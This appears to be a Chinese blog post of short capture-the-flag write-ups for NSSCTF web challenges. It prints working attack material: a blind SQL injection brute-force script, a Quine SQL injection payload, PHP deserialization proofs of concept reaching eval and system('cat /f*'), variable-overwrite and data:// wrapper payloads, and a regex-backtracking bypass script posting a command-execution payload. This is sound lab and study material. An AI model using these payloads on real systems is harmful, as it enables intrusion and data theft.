随机NSSCTF开盲盒做题
持续更新
[HNCTF 2022 WEEK2]easy_include
读日志:/var/log/nginx/access.log
日志包含一句话木马
[NISACTF 2022]hardsql
$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
密码登陆即可,直接上python脚本即可
import requests
url = 'http://node5.anna.nssctf.cn:28465/login.php'
dict = '0123456789qwertyuiopasdfghjklzxcvbnm-'
flag = ''
for j in range(50):
for i in dict:
data = {
"username": "bilala",
"passwd": f"-1'/**/or/**/passwd/**/like/**/'{flag+i}%'#"
}
# print(data)
res = requests.post(url=url, data=data)
# print(res.text)
if 'nothing found' not in res.text:
# print(i)
# print(res.text)
flag+=i
print(flag)
break
b2f2d15b3ae082ca29697d8dcd420fd7
<?php
//多加了亿点点过滤
include_once("config.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
alertMes('waf here', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
$username=$_POST['username'];
$password=$_POST['passwd'];
if ($username !== 'bilala') {
alertMes('only bilala can login', 'index.php');
}
checkSql($password);
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
$user_result=mysqli_query($MysqlLink,$sql); //执行sql语句查询
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes('nothing found','index.php');
}
if ($row['passwd'] === $password) {
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
}
?>
需要绕过这一段:
if ($row['passwd'] === $password) {
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
在这里重新学习了sql盲注:
select mid(database(),1,1)='';
# mid substr一样
select database() regexp '^[]'; 这里填入正则表达式
regexp
regexp ‘^[a-z]’ 判断一个表的第一个字符串是否在a-z中
regexp ‘^r’ 判断第一个字符串是否为r
regexp ‘^r[a-z]’ 判断一个表的第二个字符串是否在a-z中
like 匹配注入点击跳转
百分比(%)通配符允许匹配任何字符串的零个或多个字符。
下划线(_)通配符允许匹配任何单个字符。
like ‘r%’ 判断第一个字符是否为r
like ‘ro%’ 判断前面两个字符串是否为ro
like ‘%ro%’ 判断是否包含ro两个字符串
like ‘%root%’ 判断是否包含root字符串
like ‘____’ 判断是否为4个字符
like ‘r___’ 判断第一个字符是否为r
https://smelond.com/2018/04/04/sql%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%9B%B2%E6%B3%A8%E6%94%BB%E5%87%BB/#ORD%E5%87%BD%E6%95%B0
学习Quine注入
REPLACE ( string_expression , string_pattern , string_replacement )
即将string_expression中所有string_pattern替换为string_replacement
这题的payload:
'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#
这题因为char函数被禁止了
0x22->char(34) 0x22=="
0x27->char(39) 0x27=='
一般的quine注入的payload:
'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#
还可以用chr绕过
[HNCTF 2022 Week1]easy_upload
这题直接简单的改后缀名,进行文件上传即可,这里就不做多的描述
[UUCTF 2022 新生赛]ez_unser
这个poc本地能打通,远端打不通,也不知道为什么
<?php
show_source(__FILE__);
###very___so___easy!!!!
class test{
public $a;
public $c;
public function __construct(){
$this->a=1;
$this->c=3;
}
public function __wakeup(){
$this->a='';
}
public function __destruct(){
//eval($this->a);
}
}
$a = new test;
$a->a = 'phpinfo();';
$a->c= '123';
echo serialize($a);
O:4:"test":2:{s:1:"a";s:10:"phpinfo();";s:1:"c";s:3:"123";}
直接用这个poc吧
这个poc是将$this->a和$this->b使用同一个内存空间进行绕过,相当于给c赋值,在destruct执行时就是在给a赋值
<?php
show_source(__FILE__);
###very___so___easy!!!!
class test{
public $a;
public $b;
public $c;
public function __construct(){
$this->a=1;
$this->b=2;
$this->c=3;
}
public function __wakeup(){
$this->a='';
}
public function __destruct(){
$this->b=$this->c;
eval($this->a);
}
}
$a = new test;
$a->b = &$a->a;
$a->c = "system('cat /f*');";
echo serialize($a);
[MoeCTF 2022]ezphp
题目源码:
<?php
highlight_file('source.txt');
echo "<br><br>";
$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($giveme);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($getout);
}
foreach ($_POST as $key => $value) {
$$key = $value;
}
foreach ($_GET as $key => $value) {
$$key = $$value;
}
echo 'the flag is : ' . $flag;
?>
foreach ($_POST as $key => $value) {
$$key = $value;
}
相当于把$_POST的键值赋值给$key,而把$_POST的内容赋值给$value,如果传入POST内容为flag=1;
这个$$key = flag=1
foreach ($_GET as $key => $value) {
$$key = $$value;
}
而这个也是一样的原理
foreach ($_GET as $key => $value):这是一个 foreach 循环结构,用于遍历$_GET数组中的每个元素。在每次循环迭代中,将当前元素的键赋值给变量$key,将当前元素的值赋值给变量$value。
最后的payload:
GET /?a=flag&flag=a
这个相当于$a = $flag
$flag = $a;
[SWPUCTF 2022 新生赛]xff
直接考请求头Refer
和XFF本地ip即可
[GDOUCTF 2023]泄露的伪装
dirsearch扫描一下即可,出现泄露文件
<?php
error_reporting(0);
if(isset($_GET['cxk'])){
$cxk=$_GET['cxk'];
if(file_get_contents($cxk)=="ctrl"){
echo $flag;
}else{
echo "洗洗睡吧";
}
}else{
echo "nononoononoonono";
}
?>
/orzorz.php?cxk=data:text/plain,ctrl
data协议利用条件:
- php版本大于等于php5.2
- allow_url_fopen = On
- allow_url_include = On
直接利用data协议传参数即可
还可以用BP,使用php://input协议来进行传参
[NISACTF 2022]middlerce
这题利用php中正则匹配()的回溯机制进行绕过的(一般与贪婪量词配合使用)
这题后面还挺有意思的,短标签绕过进行代码执行和闭合php文件
POC脚本:
import requests
url = "http://node4.anna.nssctf.cn:28573/"
payload1 = '{"cmd":"?><?=`nl /f*`;?>//","t":"' + "@"*1000000 + '"}'
payload = {
"letter":payload1
}
re = requests.post(url=url,data=payload)
print(re.text)
[安洵杯 2020]Normal SSTI
docker run --net host -it marven11/fenjing webui
工具直接一把梭哈